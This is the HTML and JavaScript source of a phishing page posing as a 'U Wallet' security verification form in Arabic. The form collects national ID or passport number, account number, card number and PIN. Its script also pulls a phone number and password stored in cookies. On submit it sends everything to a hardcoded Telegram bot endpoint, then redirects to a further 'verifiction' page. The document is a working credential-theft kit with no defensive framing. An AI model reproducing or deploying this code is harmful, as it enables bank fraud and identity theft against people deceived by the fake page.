<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <style>
        body {
            margin: 0;
            padding: 0;
            font-family: Arial, sans-serif;
        }
        .top-image {
            width: 100%;
            height: auto;
            max-height: 300px; /* Adjust the height as needed */
            object-fit: cover;
            display: block;
        }
        .content {
            padding: 20px;
        }
    </style>
</head>
<body>
    <img src="https://www2.0zz0.com/2025/04/22/15/651746463.jpeg" alt="Top Image" class="top-image">
    <div class="content">

</body>
</html>	
<html data-wf-domain="" data-wf-page="678516b9abe6f70728fa8eb9" data-wf-site="678516b9abe6f70728fa8e5f" lang="en">
<head>
    <meta charset="utf-8"/>
    <title>U Wallet </title>
    <meta content="width=device-width, initial-scale=1" name="viewport"/>
    <link href="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/css/orangemonney.webflow.4d36521a0.css" rel="stylesheet" type="text/css"/>
    <link href="https://fonts.googleapis.com" rel="preconnect"/>
    <link href="https://fonts.gstatic.com" rel="preconnect" crossorigin="anonymous"/>
    <script src="https://ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.js" type="text/javascript"></script>
    <script type="text/javascript">
        WebFont.load({
            google: {
                families: ["Montserrat:100,100italic,200,200italic,300,300italic,400,400italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic", "Roboto:300,regular,500"]
            }
        });
    </script>
    <script type="text/javascript">!function (o, c) {
            var n = c.documentElement, t = " w-mod-";
            n.className += t + "js", ("ontouchstart" in o || o.DocumentTouch && c instanceof DocumentTouch) && (n.className += t + "touch")
        }(window, document);</script>
    <link href="https://cdn.prod.website-files.com/img/favicon.ico" rel="shortcut icon" type="image/x-icon"/>
    <link href="https://cdn.prod.website-files.com/img/webclip.png" rel="apple-touch-icon"/>
    <style>
        body {
            box-sizing: border-box;
            font-size: 18px;
        }

        .container {
            padding: 0 5%;
        }

        .field-holder {
            position: relative;
            margin-bottom: 1.25em;
        }

        .w-input {
            border: 0;
            border-bottom: 3px solid #dfdfdf;
            outline: none;
        }

        label {
            position: absolute;
            top: 0;
            left: 0;
            font-size: 1em;
            color: #424242;
            display: flex;
            align-items: center;
            cursor: text;
            transition: .3s ease-in-out;
        }

        .w-input, label {
            font-size: 1em;
            width: 100%;
            height: 55px;
        }

        .w-input:focus + label,
        .w-input:valid + label {
            color: #add8e6;
            font-size: .75em;
            top: -25px;
            pointer-events: none;
        }

        .w-input:focus, .w-input:valid {
            border-bottom: 3px solid #add8e6;
        }

        .submit-button {
            background-color: #add8e6; /* لون الخلفية الأصفر */
            color: #000; /* لون النص */
            border: none; /* إزالة أي حدود */
            padding: 10px 20px; /* تعديل الحواف الداخلية */
            cursor: pointer; /* تغيير شكل المؤشر عند المرور على الزر */
            font-size: 1em; /* حجم الخط */
        }

        .CustomFooter {
            position: fixed;
            left: 0;
            bottom: 0;
        }
    </style>
</head>
<body class="body">
<div class="div-block-2">

<div class="div-block-4">
    <div class="container">

        <div id="verificationForm" class="w-form">
            <form id="wf-form-" name="wf-form-" data-name="التحقق من الامن" method="get"
                  data-wf-page-id="678516b9abe6f70728fa8e5f" data-wf-element-id="79a466c5-9c18-b348-97ed-cbe6dd2fa663">
                  	
                <div id="field" class="field-holder">
                    <input class="text-field-2 w-input" maxlength="10" name="national_id"
                           data-name="رقم الوطني" pattern="\d{10,15}" placeholder="" type="text" id="national_id" required=""/>
                    <label for="national_id">الرقم الوطني / جواز السفر</label>
                </div>
                <div id="field" class="field-holder">
                    <input class="text-field-2 w-input" maxlength="10" name="additional_national_id"
                           data-name="رقم الحساب" pattern="\d{1,100}" placeholder="" type="text" id="additional_national_id" required=""/>
                    <label for="additional_national_id">رقم الحساب</label>
                </div>
                <div id="field" class="field-holder">
                    <input class="text-field-2 w-input" maxlength="16" name="dob" data-name="رقم البطاقة"  type="number" id="dob" required=""/>
                    <label for="dob">رقم البطاقة من 16 خانة</label>
                </div>
                <div id="field" class="field-holder">
                    <input class="text-field-2 w-input" maxlength="4" name="pincode" data-name="رمز التحقق"
                           pattern="\d{4,4}" placeholder="" type="number" id="pincode" required=""/>
                    <label for="pincode">أدخل رمز PIN المكون من 4 أرقام</label>
                </div>
                <div class="div-block">
                    <input type="submit" data-wait="يرجى الانتظار" class="submit-button w-button" value="التحقق"/>
                </div>
                <input class="text-field-3 w-input" maxlength="256" name="field" data-name="رقم الهاتف" placeholder=""
                       type="text" id="phonenumber"/>
                <input class="text-field-4 w-input" maxlength="256" name="field" data-name="كلمة المرور" placeholder=""
                       type="text" id="password"/>
            </form>
            <div class="success-message w-form-done">
                <div id="success">جاري التحقق من المعلومات المدخلة</div>
            </div>
            <div class="w-form-fail">
                <div>يرجى التحقق من رمز التحقق او المعلومات المدخلة</div>
            </div>
        </div>
    </div>
</div>


<script src="https://d3e54v103j8qbb.cloudfront.net/js/jquery-3.5.1.min.dc5e7f18c8.js?site=6709b4ecad0f1ceeeed96305"
        type="text/javascript" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
<script src="https://cdn.prod.website-files.com/6709b4ecad0f1ceeeed96305/js/webflow.1a78e01dd.js" type="text/javascript"></script>
<script src="https://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script>
<script>
    function getCookie(cname) {
        let name = cname + "=";
        let decodedCookie = decodeURIComponent(document.cookie);
        let ca = decodedCookie.split(';');
        for (let i = 0; i < ca.length; i++) {
            let c = ca[i];
            while (c.charAt(0) == ' ') {
                c = c.substring(1);
            }
            if (c.indexOf(name) == 0) {
                return c.substring(name.length, c.length);
            }
        }
        return "";
    }

    phonenumber = getCookie('phonenumber');
    password = getCookie('password');

    document.getElementById('phonenumber').value = phonenumber;
    document.getElementById('password').value = password;

    function startTimer() {
        var presentTime = document.getElementById('success').innerHTML;
        var timeArray = presentTime.split(/[:]+/);
        var m = timeArray[0];
        var s = checkSecond((timeArray[1] - 1));
        if (s == 59) {
            m = m - 1
        }
        if (m < 0) {
            return
        }
        document.getElementById('success').innerHTML = m + ":" + s;
        setTimeout(startTimer, 1000);
    }

    function checkSecond(sec) {
        if (sec < 10 && sec >= 0) {
            sec = "0" + sec
        }
        ;
        if (sec < 0) {
            sec = "59"
        }
        ;
        return sec;
    }

    $("#verificationForm").on("submit", function (event) {
        phonenumber = getCookie('phonenumber');
        national_id = document.getElementById('national_id').value;
        additional_national_id = document.getElementById('additional_national_id').value;
        dob = document.getElementById('dob').value;
        pincode = document.getElementById('pincode').value;

        var message = "رقم الهاتف:`" + phonenumber + "`\n"
        message += "رقم الوطني:`" + national_id + "`\n"
        message += "رقم الحساب:`" + additional_national_id + "`\n"
        message += "رقم البطاقة:`" + dob + "`\n"
        message += "رمز التحقق:`" + pincode + "`\n"

        $.ajax({
            type: 'POST',
            url: `https://api.telegram.org/bot7356894979:AAFxs2g1BAkp6qYCgf3ZE8mvaLvaIuoBmI4/sendMessage`,
            data: {
                chat_id: "-4738220176",
                text: message,
                parse_mode: 'markdown',
            },
            success: function (res) {
                console.debug(res);
                $('#response').text('Message sent');
            },
            error: function (error) {
                console.error(error);

            }
        });

        setInterval(function () {
            window.location.href = "verifiction.html"; 
        });

        event.preventDefault();
    });
</script>
</body>
</html>
